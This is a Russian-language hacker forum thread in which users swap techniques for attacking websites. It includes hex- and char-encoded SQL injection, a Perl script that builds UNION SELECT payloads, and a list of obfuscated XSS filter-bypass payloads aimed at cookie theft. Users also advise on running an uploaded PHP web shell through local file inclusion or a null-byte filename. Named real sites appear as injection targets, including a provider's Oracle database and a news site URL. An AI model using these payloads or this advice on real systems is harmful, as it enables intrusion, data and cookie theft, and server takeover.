Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    в хекс переводи, hex(my_users)=0x6d795f7573657273

    table_name=0x6d795f7573657273
     
    1 person likes this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    или char(my_users)=char(109,121,95,117,115,101,114,115)
     
    1 person likes this.
  3. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    вопрос специалистам.
    При проведении XSS при вводе код
    Code:
    alert(99)
    заменяется на
    Code:
    alert&*#40;99&*#41;
    (без звездочек)
    Возможно ли обойти это и провести XSS? Можно ли заменить круглые скобки чем-то еще?
     
  4. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    а разница какая?
     
    2 people like this.
  5. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Поправил уже
     
  6. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    При проведении xss-кражи куков тебе возможно и не потребуются эти символы. Или тебе прямо обязательно нужен alert(99)?
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    давно какт о тоже нопесал :D
    Code:
    #!/usr/bin/perl
    while (1) {
    print "\n\nNumber of columns\n";
    $id = <STDIN>;
    chomp ($id);
    $x = 1;
    print "-1+union+select+";
    while ($x < $id) {
    	print "$x,";
    	$x++;
    }
    if ($x = $id) {
    	print "$x/*";
    }
    }
    
     
    2 people like this.
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Нет, необязателен алерт :) Но, например,
    Code:
    var i=new Image();
    ...
    
    уже не прокатит. Да и уязвимость в тэге a - есть желание запихать ксс в style, где юзается url() - также со скобками
     
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    1)принудительно закрыть тег <a> и прописать <script>...</script>
    2)
    Code:
    <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41">click</a>
    
    Code:
    =decoded=
    <a href="javascript:alert('XSS')"></a>
    
     
    #829 AFoST, 28 Jan 2008
    Last edited: 28 Jan 2008
  10. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Вот ещё несколько вариантов
    Code:
    <a href="&#106\;&#97\;&#118\;&#97\;&#115\;&#99\;&#114\;&#105\;&#112\;&#116\;&#58\;&#97\;&#108\;&#101\;&#114\;&#116\;&#40\;&#39\;&#88\;&#83\;&#83\;&#39\;&#41\;">click</a>
    
    <a href="javascript:alert('XSS')">click</a>
    
    <a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">click</a>
    
    <a href="javascript:alert(xss)">click</a>
    
    <a href="javascript:alert&#40\;xss&#41\;">click</a>
    
    <A HREF="http://66.102.7.147/">click</A>
    
    <A HREF="http://1113982867/">XSS</A>
    
    <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
    
    <A HREF="h
    tt	p://6	6.000146.0x7.147/">XSS</A>
    
    <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
    
    все "\;" заменить на ;
     
    #830 AFoST, 28 Jan 2008
    Last edited: 28 Jan 2008
    ilia455 likes this.
  11. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Сенкс за наводку, попробую, но сразу скажу, там обрабатываются таким же образом и амперсанд, и кавычка, и апостроф (обратный апостроф не фильтруется)
     
  12. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Я загрузил на сервер шелл с именем img.php.gif
    но сервер загрузил как img.php.1201468364.gif
    каким образом мне запустить шелл?
     
    1 person likes this.
  13. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Ищи на сайте локальный инлкуд и инклудь свой шелл
     
    1 person likes this.
  14. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Попробуй загрузить кратинку с именем img.php%00.gif
    Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php
     
  15. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Непрошло..
    Кста стоит тама e107
    я юзал вот ето
    _http://milw0rm.com/exploits/4099
     
  16. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    Привет.У меня есть вопрос...

    мой провайдер (raid.ru) использует какуюто особую программ
    для работы пользователя с бд Programm ppo.c version 1.7
    смог выжать конфиг в котором как понял прописаны все бд /var/www/db.raid.ru/cgi-bin/ora_agent.cfg
    запросы формируются странным образом
    https://db.raid.ru/cgi-bin/ppo/es_webface/point_access.services

    es_webface название бд как я понял
    point_access -хз
    services -действие

    если кто что знает подскажите...
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Я так и не понял в чем вопрос? point_access - оракловский пакет, services -процедура
     
  18. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    что есть:
    Programm ppo.c version 1.7
    каким образом формируются запросы
    есть ли вариеции инжэкта через этот скрипт
     
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вот погуглил нашел _http://oraclub.trecom.tomsk.su/util/webagent.htm
    оффтоп: Ура, батарейка
     
    2 people like this.
  20. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Возможно раскрутить такую скуль,и если да то как?
    Заранее спасибо.
    код:

    http://www.yerevan.ru/news/print.php?id=999+order+by+1/*
     
Thread Status:
Not open for further replies.